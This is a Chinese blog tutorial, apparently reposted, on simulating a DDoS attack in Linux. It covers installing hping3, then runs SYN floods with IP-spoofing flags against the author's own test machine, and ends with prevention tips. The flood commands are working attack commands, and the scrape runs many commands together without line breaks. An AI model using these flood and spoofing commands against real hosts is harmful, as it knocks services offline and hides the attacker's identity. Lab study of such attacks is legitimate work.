ddos攻击工具_linux下DDoS攻击模拟实战
前言:電影院如期開放,據前線消息,人實在是少,有些場次一個人看一場,在華夏有電影院開始,應該都少有這種場景吧,再次希望疫情早日散去,在此引用一句話來配合一次圖:“直到烏云散去風雨落幕,我們一起走向未來。”
一,什么是DDoS攻擊
分布式拒絕服務攻擊(英文意思是Distributed Denial of Service,簡稱DDoS)是指處于不同位置的多個攻擊者同時向一個或數個目標發動攻擊,或者一個攻擊者控制了位于不同位置的多臺機器并利用這些機器對受害者同時實施攻擊。由于攻擊的發出點是分布在不同地方的,這類攻擊稱為分布式拒絕服務攻擊,其中的攻擊者可以有多個。常見的DDOS攻擊手段有SYN Flood、ACK Flood、UDP Flood、ICMP Flood、TCP Flood、Connections Flood、Script Flood、Proxy Flood等
二,利用hping3工具DOS攻擊實驗
1,準備:
需要兩臺機器,一臺扮演攻擊源,另一做目標源。
攻擊源地址(我這用centos7虛擬機):192.168.142.128
被攻擊機器地址(我這用本機):192.168.1.114
2,準備軟件
centos7.x系統
winshake抓包軟件/linux下可以用tcpdump
hping3軟件
3,軟件安裝,
winshake 可以在官網下載對應
https://www.wireshark.org/download.htmllinux下安裝hping3軟件和tcpdump如下:
?#yum安裝tcpdump yum install tcpdump -y#源碼安裝hping3#安裝依賴yum?install?-y?libpcap?libpcap-devel?tcl?tcl-devel?gccwget http://www.hping.org/hping3-20051105.tar.gztar -xzvf hping3-20051105.tar.gz && cd hping3-20051105./configuremakemake?instal這里有幾個安裝問題需要注意下:
1,因為我的centos7虛機鏡像是3.10.0-229.el7.x86_64,64位的操作系統,而bytesex.h沒有對64位的支持,所以./configure時會報“build byteorder.c時出現如下錯誤”
解決:在解壓目錄編輯bytesex.h,指定位置加上|| defined(__x86_64__)\
vim hping3-20051105/bytesex.h#在defined(__i386__) \后面加上下面這行|| defined(__x86_64__)\2,報錯libpcap_stuff.c:20:21: fatal error: net/bpf.h: No such file or directory
這是因為安裝pcap庫后沒做軟鏈接,解決如下:
ln?-sf?/usr/include/pcap-bpf.h?/usr/include/net/bpf.h3,報錯Can't install the man page: /usr/local/confd/man/man8 does not exist
解決:手動創建/usr/local/confd/man/man8目錄
mkdir -p /usr/local/confd/man/man8#如果已經make?install,還需要執行下面三句才能重新make installrm?-rf?/usr/sbin/hping3rm?-rf?/usr/sbin/hpingrm -rf /usr/sbin/hping2#最后執行make install如上解決完,執行hping3 -help,如下圖,代表軟件已經安裝成功
三,DDoS攻擊實踐
1,在攻擊源,也就是我的虛擬機端輸入如下命令,這里兩個命令唯一的區別是--rand-source參數,目標機器會看到一堆ip,不能定位你的實際IP。
hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood 192.168.1.114hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood --rand-source 192.168.1.114#命令解釋-c:發送數據包的個數-d:每個數據包的大小-S:發送SYN數據包-w:TCP window大小-p:目標端口,你可以指定任意端口–flood:盡可能快的發送數據包–rand-source:使用隨機的IP地址,目標機器看到一堆ip,不能定位你的實際IP;也可以使用-a或–spoof隱藏主機名實際觀察下兩個命令的效果
(1)hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood 192.168.1.114
打開winshake,查看抓包情況
(2)hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood --rand-source 192.168.1.114可以看出,攻擊者ip已經被隱藏
四,ddos攻擊預防
小編認為,想完全防御住ddos的攻擊并不現實的,不過我們可以做到如下幾點來有限的限制ddos攻擊的損害
1,盡量避免NAT的使用
2,充足的網絡帶寬保證?
3,把網站做成靜態頁面? ?
4,設定路由器的過濾功能來防止
5,網絡設備或主機都需要隨時更新其系統漏洞、關閉不需要的服務、安裝必要的防 毒和防火墻軟件、隨時注意系統安全,避免被黑客和自動化的 DDoS 程序植入攻擊程序
6,通過隱藏源IP方式可以實現,前提是要先找一個高防的盾機,再把IP隱藏起來(小編認為最有效的是這種方法,不過前提是需要一臺服務器)
五,總結
目前開源的ddos攻擊工具有很多(攻擊成本低,也是DDOS攻擊易于發生的原因之一),但DDOS攻擊防御工具并不多,所以作為個人,我們應該定期維護好自己的設備,比如定時更新或者開啟防火墻規則,避免被人植入木馬,從而成為洪水攻擊的幫兇最后的最后,歡迎交流:
關注公眾號留言,或者在下方直接留言:
總結
以上是生活随笔為你收集整理的ddos攻击工具_linux下DDoS攻击模拟实战的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: InnoDB原理篇:如何用好索引
- 下一篇: 92年清华本科,做了30年技术,43岁在